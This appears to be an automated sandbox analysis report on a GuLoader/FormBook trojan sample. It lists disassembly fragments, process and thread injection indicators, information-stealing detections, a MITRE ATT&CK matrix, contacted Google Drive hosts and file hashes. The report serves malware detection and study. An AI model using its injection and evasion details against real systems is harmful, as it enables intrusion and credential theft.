        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B82E0 mov eax, dword ptr fs:[00000030h]2_2_377B82E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37830227 mov eax, dword ptr fs:[00000030h]2_2_37830227
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37830227 mov eax, dword ptr fs:[00000030h]2_2_37830227
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_37830227 mov eax, dword ptr fs:[00000030h]2_2_37830227
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D32C5 mov eax, dword ptr fs:[00000030h]2_2_377D32C5
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786F247 mov eax, dword ptr fs:[00000030h]2_2_3786F247
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AC2B0 mov ecx, dword ptr fs:[00000030h]2_2_377AC2B0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787124C mov eax, dword ptr fs:[00000030h]2_2_3787124C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787124C mov eax, dword ptr fs:[00000030h]2_2_3787124C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787124C mov eax, dword ptr fs:[00000030h]2_2_3787124C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3787124C mov eax, dword ptr fs:[00000030h]2_2_3787124C
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D42AF mov eax, dword ptr fs:[00000030h]2_2_377D42AF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D42AF mov eax, dword ptr fs:[00000030h]2_2_377D42AF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A92AF mov eax, dword ptr fs:[00000030h]2_2_377A92AF
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3786D270 mov eax, dword ptr fs:[00000030h]2_2_3786D270
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3784327E mov eax, dword ptr fs:[00000030h]2_2_3784327E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3784327E mov eax, dword ptr fs:[00000030h]2_2_3784327E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3784327E mov eax, dword ptr fs:[00000030h]2_2_3784327E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3784327E mov eax, dword ptr fs:[00000030h]2_2_3784327E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3784327E mov eax, dword ptr fs:[00000030h]2_2_3784327E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_3784327E mov eax, dword ptr fs:[00000030h]2_2_3784327E
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B6179 mov eax, dword ptr fs:[00000030h]2_2_377B6179
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E716D mov eax, dword ptr fs:[00000030h]2_2_377E716D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E415F mov eax, dword ptr fs:[00000030h]2_2_377E415F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AA147 mov eax, dword ptr fs:[00000030h]2_2_377AA147
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AA147 mov eax, dword ptr fs:[00000030h]2_2_377AA147
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AA147 mov eax, dword ptr fs:[00000030h]2_2_377AA147
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378851B6 mov eax, dword ptr fs:[00000030h]2_2_378851B6
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E7128 mov eax, dword ptr fs:[00000030h]2_2_377E7128
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E7128 mov eax, dword ptr fs:[00000030h]2_2_377E7128
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377E0118 mov eax, dword ptr fs:[00000030h]2_2_377E0118
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377AF113 mov eax, dword ptr fs:[00000030h]2_2_377AF113
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378781EE mov eax, dword ptr fs:[00000030h]2_2_378781EE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_378781EE mov eax, dword ptr fs:[00000030h]2_2_378781EE
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377D510F mov eax, dword ptr fs:[00000030h]2_2_377D510F
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B510D mov eax, dword ptr fs:[00000030h]2_2_377B510D
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A91F0 mov eax, dword ptr fs:[00000030h]2_2_377A91F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A91F0 mov eax, dword ptr fs:[00000030h]2_2_377A91F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C01F1 mov eax, dword ptr fs:[00000030h]2_2_377C01F1
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C01F1 mov eax, dword ptr fs:[00000030h]2_2_377C01F1
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377C01F1 mov eax, dword ptr fs:[00000030h]2_2_377C01F1
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF1F0 mov eax, dword ptr fs:[00000030h]2_2_377DF1F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DF1F0 mov eax, dword ptr fs:[00000030h]2_2_377DF1F0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377A81EB mov eax, dword ptr fs:[00000030h]2_2_377A81EB
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA1E3 mov eax, dword ptr fs:[00000030h]2_2_377BA1E3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA1E3 mov eax, dword ptr fs:[00000030h]2_2_377BA1E3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA1E3 mov eax, dword ptr fs:[00000030h]2_2_377BA1E3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA1E3 mov eax, dword ptr fs:[00000030h]2_2_377BA1E3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377BA1E3 mov eax, dword ptr fs:[00000030h]2_2_377BA1E3
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377DB1E0 mov eax, dword ptr fs:[00000030h]2_2_377DB1E0
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 2_2_377B91E5 mov eax, dword ptr fs:[00000030h]2_2_377B91E5

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: NULL target: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeSection loaded: NULL target: C:\Windows\SysWOW64\winrshost.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\winrshost.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Windows\SysWOW64\winrshost.exeThread register set: target process: 7920Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Windows\SysWOW64\winrshost.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Users\user\Desktop\rResegregation.exeProcess created: C:\Users\user\Desktop\rResegregation.exe C:\Users\user\Desktop\rResegregation.exeJump to behavior
        Source: C:\Program Files (x86)\szoXoDzskkTxxhZpoRGYohtCWuXRRKBotonSSvXwdmZhRyVfAEJdGWdZEtpIlJlyetsE\xkRPErfRaAOsoZkVUeZdSyiUrenXLw.exeProcess created: C:\Windows\SysWOW64\winrshost.exe C:\Windows\SysWOW64\winrshost.exeJump to behavior
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: RAVCpl64.exe, 00000006.00000000.28896719258.0000000000EA1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\rResegregation.exeCode function: 0_2_00405D2E GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D2E

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		11
        Masquerading        		OS Credential Dumping21
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets3
        File and Directory Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
        Obfuscated Files or Information        		Cached Domain Credentials3
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        DLL Side-Loading        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        rResegregation.exe45%ReversingLabsWin32.Trojan.Guloader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.quovadis.bm00%Avira URL Cloudsafe
        https://ocsp.quovadisoffshore.com00%Avira URL Cloudsafe
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
        http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		172.217.12.142
        		truefalse
          		high
          drive.usercontent.google.com
          		142.250.72.225
          		truefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.google.comrResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpfalse
              		high
              http://nsis.sf.net/NSIS_ErrorrResegregation.exe, rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                https://drive.google.com/rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://drive.usercontent.google.com/9rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.quovadis.bm0rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://drive.usercontent.google.com/rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://apis.google.comrResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://nsis.sf.net/NSIS_ErrorErrorrResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://ocsp.quovadisoffshore.com0rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.gopher.ftp://ftp.rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://drive.usercontent.google.com/2rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            172.217.12.142
                            		drive.google.comUnited States
                            		15169GOOGLEUSfalse
                            142.250.72.225
                            		drive.usercontent.google.comUnited States
                            		15169GOOGLEUSfalse

                            General Information

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1400163
                            Start date and time:2024-02-28 13:23:33 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 17m 32s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:3
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:rResegregation.exe
                            Detection:MAL
                            Classification:mal84.troj.evad.winEXE@5/9@2/2
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 70%
                            • Number of executed functions: 62
                            • Number of non-executed functions: 290
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded domains from analysis (whitelisted): ecs.office.com
                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: rResegregation.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            13:27:13API Interceptor10142868x Sleep call for process: winrshost.exe modified

                            Joe Sandbox View / Context

                            IPs

                            No context

                            Domains

                            No context

                            ASNs

                            No context

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            37f463bf4616ecd445d4a1937da06e19SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exeGet hashmaliciousUnknownBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exeGet hashmaliciousUnknownBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            SecuriteInfo.com.FileRepMalware.29389.28556.exeGet hashmaliciousUnknownBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            SecuriteInfo.com.FileRepMalware.29389.28556.exeGet hashmaliciousUnknownBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            Booking Information ##208.exeGet hashmaliciousGuLoader, RemcosBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            file.exeGet hashmaliciousVidarBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            Confirm!!. PDF.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            Salary - Letter _2024pdf.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            S-FACTUR@200309940049003tAomUY6Ao.MSI.msiGet hashmaliciousUnknownBrowse
                            • 142.250.72.225
                            • 172.217.12.142
                            d3NS5H0PLw.exeGet hashmaliciousAmadey, RisePro StealerBrowse
                            • 142.250.72.225
                            • 172.217.12.142

                            Dropped Files

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dllW1nnerFree CS2.exeGet hashmaliciousLoaderBot, XmrigBrowse
                              WP.exeGet hashmaliciousUnknownBrowse
                                HICAPSConnect_4.0.0.1.exeGet hashmaliciousUnknownBrowse
                                  TIjRtMJfZA.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                    TIjRtMJfZA.exeGet hashmaliciousGuLoaderBrowse
                                      Request_for_Pricelist_confirmation.xlsGet hashmaliciousGuLoaderBrowse
                                        bPYR660y5o.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                          uQP25xP5DH.exeGet hashmaliciousGuLoaderBrowse
                                            bPYR660y5o.exeGet hashmaliciousGuLoaderBrowse
                                              C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dllINNORIX-Agent.exeGet hashmaliciousUnknownBrowse
                                                INNORIX-Agent.exeGet hashmaliciousUnknownBrowse
                                                  HICAPSConnect_4.0.0.1.exeGet hashmaliciousUnknownBrowse
                                                    bPYR660y5o.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                      uQP25xP5DH.exeGet hashmaliciousGuLoaderBrowse
                                                        bPYR660y5o.exeGet hashmaliciousGuLoaderBrowse
                                                          uQP25xP5DH.exeGet hashmaliciousGuLoaderBrowse
                                                            R7MPO3ijgz.exeGet hashmaliciousGuLoaderBrowse
                                                              tNET06vnWS.exeGet hashmaliciousGuLoaderBrowse

                                                                Created / dropped Files

                                                                C:\Users\user\AppData\Local\Temp\bandidos\Clearingkontoen\skrivetjet\Vizircraft\Coreciprocal.Bge

                                                                Download File
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):121364
                                                                Entropy (8bit):4.591385986514627
                                                                Encrypted:false
                                                                SSDEEP:1536:MyVCAh2aFi7k5Imyu8o6CNwWlZdXM+S8xRpaCMr0gXjh4EpWeb:TV4aVpyNI9lDS8xbaCMXSTa
                                                                MD5:2F584A06879017E01E8261039A35FB81
                                                                SHA1:1266CDF22FB3C39FFF780D28D7E80235D37C91E0
                                                                SHA-256:65C8039FE5D44D683544C8B044DAF8247DDBDE1A1049410A7294E7370E21A0F3
                                                                SHA-512:A5C238AA036A2DEF1AA417B4ED60EC7466BC7E7A56168B124EA4482EB79FB9EF27EC1C8555B6BA531D7B724828BFEB69BE3571B12617CB75A34E0614F526B1D4
                                                                Malicious:false
                                                                Reputation:low
